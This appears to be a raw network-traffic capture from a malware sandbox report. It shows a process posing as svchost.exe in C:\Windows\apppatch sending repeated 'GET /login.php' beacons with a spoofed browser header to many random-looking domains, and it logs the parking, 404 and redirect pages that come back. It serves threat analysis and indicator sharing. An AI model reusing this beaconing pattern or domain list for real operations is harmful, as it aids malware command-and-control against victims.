User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: vojyqem.com
Cookie: parking_session=56c592c3-0730-4a19-aac9-be9b7f376588
Nov 11, 2024 18:25:29.986596107 CET | 1236 | IN | HTTP/1.1 200 OK
date: Mon, 11 Nov 2024 17:25:29 GMT
content-type: text/html; charset=utf-8
content-length: 1094
x-request-id: ad84e673-6c6c-470e-97b1-1710e1b74f69
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==
set-cookie: parking_session=56c592c3-0730-4a19-aac9-be9b7f376588; expires=Mon, 11 Nov 2024 17:40:29 GMT
                                                                                                                                                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect
Nov 11, 2024 18:25:29.986627102 CET | 520 | IN
                                                                                                                                                                                                            Data Ascii: " href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNTZjNTkyYzMtMDczMC00YTE5LWFhYzktYmU5YjdmMzc2NTg4IiwicGFnZV90aW1lIjoxNzMxMzQ1OTI5LCJwYWdlX3VybCI6Imh0dHA6L


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.10 | 62041 | 178.162.203.202 | 80 | 7908 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:25:29.559360027 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gatyfus.com


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
35          192.168.2.10  62044        208.100.26.245  80                7908  C:\Windows\apppatch\svchost.exe

Timestamp  Bytes transferred  Direction  Data
Nov 11, 2024 18:25:29.575048923 CET  243  OUT
GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lyvyxor.com
Nov 11, 2024 18:25:30.022331953 CET  744  IN
HTTP/1.1 404 Not Found
Server: nginx/1.14.0 (Ubuntu)
Date: Mon, 11 Nov 2024 17:25:29 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 11, 2024 18:25:30.271461964 CET  243  OUT
GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lyvyxor.com
Nov 11, 2024 18:25:30.375968933 CET  744  IN
HTTP/1.1 404 Not Found
Server: nginx/1.14.0 (Ubuntu)
Date: Mon, 11 Nov 2024 17:25:30 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
36          192.168.2.10  62043        23.253.46.64    80                7908  C:\Windows\apppatch\svchost.exe

Timestamp  Bytes transferred  Direction  Data
Nov 11, 2024 18:25:29.575469971 CET  243  OUT
GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gahyqah.com
Nov 11, 2024 18:25:30.016812086 CET  1236  IN
HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 11 Nov 2024 17:25:24 GMT
Content-Length: 1245
Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
Nov 11, 2024 18:25:30.016828060 CET  169  IN
Data Ascii: <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
37          192.168.2.10  62045        154.212.231.82  80                7908  C:\Windows\apppatch\svchost.exe

Timestamp  Bytes transferred  Direction  Data
Nov 11, 2024 18:25:29.583966970 CET  243  OUT
GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gadyniw.com
Nov 11, 2024 18:25:30.465089083 CET  696  IN
HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 11 Nov 2024 17:25:30 GMT
Content-Type: text/html
Content-Length: 548
Connection: keep-alive
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 11, 2024 18:25:30.484402895 CET  243  OUT
GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gadyniw.com
Nov 11, 2024 18:25:30.840529919 CET  696  IN
HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 11 Nov 2024 17:25:30 GMT
Content-Type: text/html
Content-Length: 548
Connection: keep-alive
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
38          192.168.2.10  62046        188.114.96.3    80                7908  C:\Windows\apppatch\svchost.exe

Timestamp  Bytes transferred  Direction  Data
Nov 11, 2024 18:25:29.691488028 CET  243  OUT
GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qegyhig.com
Nov 11, 2024 18:25:30.544199944 CET  973  IN
HTTP/1.1 301 Moved Permanently
Date: Mon, 11 Nov 2024 17:25:30 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Location: https://qegyhig.com/login.php
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VsyqrujlCCW9OnUrTdsWRtAkRWKqdfjh2uqMt8w%2FxzM1ZjFStdrlVVMu2qwA3tP0BhddlUqxnfHiLeA1%2F%2F8oKvecTwQ1%2Bx0m6PHQhQPiayNB4B4ZuG5bJjm5d%2BCpHw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e0ffb6089cfb006-NRT
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=155357&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=243&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                            Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.867173910 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qegyhig.com
Nov 11, 2024 18:25:32.205941916 CET | 975 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:25:32 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Location: https://qegyhig.com/login.php
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K1Axcy4%2BLUqyQ93DUcmQ0ytZYoe3fCFf1yN%2F8KEFNJFQNPlNp0b06t9KaxfezOOeS2r5leNB%2BRFaLS5tIDqYT0GSHBzplPsUathTCHH7GEjwWO3FYUaHBYdoG9qnJA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e0ffb6af8d6b006-NRT
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=155357&sent=4&recv=6&lost=0&retrans=0&sent_bytes=973&recv_bytes=486&delivery_rate=18633&cwnd=32&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                            Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.10 | 62047 | 99.83.170.3 | 80 | 7908 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:25:29.739269972 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: puzylyp.com
Nov 11, 2024 18:25:30.171583891 CET | 166 | IN | HTTP/1.1 308 Permanent Redirect
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Location: https://puzylyp.com/login.php
                                                                                                                                                                                                            Server: Caddy
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:25:30 GMT
                                                                                                                                                                                                            Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.10 | 62048 | 23.253.46.64 | 80 | 7908 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:25:30.315834045 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gahyqah.com
Nov 11, 2024 18:25:30.773809910 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Server: Microsoft-IIS/7.5
                                                                                                                                                                                                            X-Powered-By: ASP.NET
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:25:25 GMT
                                                                                                                                                                                                            Content-Length: 1245
                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
Nov 11, 2024 18:25:30.773822069 CET | 169 | IN |
                                                                                                                                                                                                            Data Ascii: <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.10 | 62052 | 178.162.203.202 | 80 | 7908 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:25:37.549607992 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gatyfus.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.10 | 49739 | 99.83.170.3 | 443 | 7908 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-11 17:24:31 UTC | 267 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: puzylyp.com
                                                                                                                                                                                                            Connection: Keep-Alive
2024-11-11 17:24:31 UTC | 352 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000
                                                                                                                                                                                                            Cache-Control: private, no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:24:31 GMT
                                                                                                                                                                                                            Etag: "lahtfw1zoc19wv"
                                                                                                                                                                                                            Server: Caddy
                                                                                                                                                                                                            Server: awselb/2.0
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            X-Powered-By: Next.js
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Transfer-Encoding: chunked
2024-11-11 17:24:31 UTC | 2372 | IN |
                                                                                                                                                                                                            Data Ascii: 8000<!DOCTYPE html><html lang="en-US"><head><meta charSet="utf-8"/><link rel="apple-touch-icon" sizes="180x180" href="https://d15wejze7d2tlj.cloudfront.net/v1/public/apple-touch-icon.png"/><link rel="icon" type="image/png" sizes="32x32" href="https://d1
2024-11-11 17:24:31 UTC | 1724 | IN |
                                                                                                                                                                                                            Data Ascii: ext/static/chunks/b155a556-7277d205b3a96dd1.js" defer=""></script><script src="https://d15wejze7d2tlj.cloudfront.net/v1/_next/static/chunks/b779bb5e-e34ac6f2b32ee9b1.js" defer=""></script><script src="https://d15wejze7d2tlj.cloudfront.net/v1/_next/static/
2024-11-11 17:24:31 UTC | 4744 | IN |
                                                                                                                                                                                                            Data Ascii: x-col gap-2 mb-6"><h2 class="font-Inter text-xl font-bold sm:text-2xl">Inquire today to secure this domain</h2><span class="font-Inter text-sm font-normal sm:text-base">Please complete the form below and we will connect you with one of our domain experts.
2024-11-11 17:24:31 UTC | 5930 | IN |
                                                                                                                                                                                                            Data Ascii: -- -->)</option><option value="DE">DE... --> (+... -->49... -->)</option><option value="PE">PE... --> (+... -->51... -->)</option><option value="MX">MX... --> (+... -->52... -->)</option><option value="CU">CU... --> (+... -->53... -->)</option
2024-11-11 17:24:31 UTC | 7116 | IN |
                                                                                                                                                                                                            Data Ascii: --> (+... -->356... -->)</option><option value="CY">CY... --> (+... -->357... -->)</option><option value="AX">AX... --> (+... -->358... -->)</option><option value="FI">FI... --> (+... -->358... -->)</option><option value="BG">BG... --> (+...
2024-11-11 17:24:31 UTC | 8302 | IN |
                                                                                                                                                                                                            Data Ascii: ice-request-form-id" title="Get price" aria-label="Get price" label="Get price" endIcon="[object Object]"><span class="flex justify-center items-center gap-1.5 mx-auto"><div class="flex items-center gap-2">Get price<svg xmlns="http://www.w3.org/2000/svg"
2024-11-11 17:24:31 UTC | 2586 | IN |
                                                                                                                                                                                                            Data Ascii: 0.3v.067h-.136v.068h-.068v.068h-.067V.76H9.96v.068h-.136v.067h-.068v.068H9.69v.068H9.62v.068h-.068v.068h-.135v.067H9.35v.068h-.068v.068h-.068v.068h-.068v.067H9.08v.068H9.01v.068h-.068v.068h-.068v.068h-.067v.067H8.74v.068h-.068v.068h-.068v.068h-.068v.067H8
                                                                                                                                                                                                            2024-11-11 17:24:31 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                            2024-11-11 17:24:31 UTC4096INData Raw: 36 38 38 31 0d 0a 65 6e 74 43 6f 6c 6f 72 22 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 32 39 2e 36 37 20 34 2e 34 37 34 68 2d 33 2e 39 34 36 76 31 31 2e 32 38 37 68 33 2e 39 34 35 63 33 2e 36 30 36 20 30 20 35 2e 39 35 2d 32 2e 32 31 35 20 35 2e 39 35 2d 35 2e 36 32 37 20 30 2d 33 2e 34 32 39 2d 32 2e 33 34 34 2d 35 2e 36 36 2d 35 2e 39 35 2d 35 2e 36 36 6d 2d 31 2e 36 38 33 20 39 2e 33 36 32 56 36 2e 33 38 32 68 31 2e 36 30 31 63 32 2e 33 37 38 20 30 20 33 2e 37 32 20 31 2e 34 30 37 20 33 2e 37 32 20 33 2e 37 35 32 73 2d 31 2e 33 34 32 20 33 2e 37 30 32 2d 33 2e 37 32 20 33 2e 37 30 32 7a 6d 31 37 2e 39 38 32 2d 32 2e 35 35 34 63 30 2d 32 2e 38 33 2d 32 2e 30 32 32 2d 34 2e 36 32 35 2d 34 2e 36 30 39 2d 34 2e 36 32 35 73
                                                                                                                                                                                                            Data Ascii: 6881entColor" fill-rule="evenodd" d="M29.67 4.474h-3.946v11.287h3.945c3.606 0 5.95-2.215 5.95-5.627 0-3.429-2.344-5.66-5.95-5.66m-1.683 9.362V6.382h1.601c2.378 0 3.72 1.407 3.72 3.752s-1.342 3.702-3.72 3.702zm17.982-2.554c0-2.83-2.022-4.625-4.609-4.625s
                                                                                                                                                                                                            2024-11-11 17:24:31 UTC13046INData Raw: 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 31 33 35 76 2d 2e 30 36 38 68 2d 2e 31 33 36 76 2d 2e 30 36 38 68 2d 2e 31 33 36 76 2d 2e 30 36 37 68 2d 2e 30 36 37 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 37 68 2d 2e 30 36 37 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 31 33 36 76 2d 2e 31 33 35 68 2d 2e 30 36 37 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 31 33 35 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 37 76 2d 2e 31 33 36 68 2d 2e 30 36 38 76 2d 2e 30 36 37 68 2d 2e 30 36 38 76 2d 2e 31 33 36 68 2d 2e 30 36 38 76 2d 2e 31 33 36
                                                                                                                                                                                                            Data Ascii: 068h-.068v-.068h-.135v-.068h-.136v-.068h-.136v-.067h-.067v-.068h-.068v-.068h-.068v-.068h-.068v-.067h-.067v-.068h-.068v-.068h-.068v-.068h-.136v-.135h-.067v-.068h-.068v-.068h-.068v-.135h-.068v-.068h-.068v-.068h-.067v-.136h-.068v-.067h-.068v-.136h-.068v-.136


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.10 | 49740 | 188.114.96.3 | 443 | 7908 | C:\Windows\apppatch\svchost.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-11 17:24:31 UTC | 267 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qegyhig.com
Connection: Keep-Alive
2024-11-11 17:24:31 UTC | 950 | IN | HTTP/1.1 404 Not Found
Date: Mon, 11 Nov 2024 17:24:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
vary: Accept-Encoding
expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PyFL6VAvOnFvD1bpa9f8VdEyic%2BvDdTMGmG%2Ff6yfp2eUzAVR2fvsMKqGVEdJgJquHamRCnzfIMmKVtvLzXyhjUhto1zmOlB4yrE%2BB1YX5QpnxtM80JLE%2Fb8rS4C2GA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e0ff9ee4a2e183d-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1231&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2824&recv_bytes=881&delivery_rate=2149962&cwnd=250&unsent_bytes=0&cid=29c9b339551dce15&ts=1161&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.10 | 49761 | 188.114.96.3 | 443 | 7908 | C:\Windows\apppatch\svchost.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-11 17:24:32 UTC | 267 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qegyhig.com
Connection: Keep-Alive
2024-11-11 17:24:33 UTC | 946 | IN | HTTP/1.1 404 Not Found
Date: Mon, 11 Nov 2024 17:24:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
vary: Accept-Encoding
expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ijf5A6dkhwJpd1g%2FqnVvyygdBKHgUgzjFFRiB9HeFb6jOqtSidGKZX1YIGosrAOb1%2FR2wsJPQ7QqrJ7fTGvX3nTtw8%2BYk8aHoDb5jm5L07pH3uVcVDlxLEJliTDIeg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e0ff9fa69a9a2db-YUL
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=11393&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2823&recv_bytes=881&delivery_rate=254124&cwnd=32&unsent_bytes=0&cid=7fcd1c432caa2cca&ts=788&x=0"
                                                                                                                                                                                                            Data Ascii: typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse
                                                                                                                                                                                                            2024-11-11 17:24:33 UTC1369INData Raw: 74 65 6d 6f 6a 69 3f 74 28 65 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 29 3a 65 2e 77 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 61 73 74 72 61 2d 74 68 65 6d 65 2d 63 73 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 71 65 67 79 68 69 67 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 61 73 74 72 61 2f 61 73 73 65 74 73 2f 63 73 73 2f 6d 69 6e 69 66 69 65 64 2f 6d 61 69 6e
                                                                                                                                                                                                            Data Ascii: temoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);</script><link rel='stylesheet' id='astra-theme-css-css' href='https://qegyhig.com/wp-content/themes/astra/assets/css/minified/main


Session ID | Source IP | Source Port | Destination IP | Destination Port
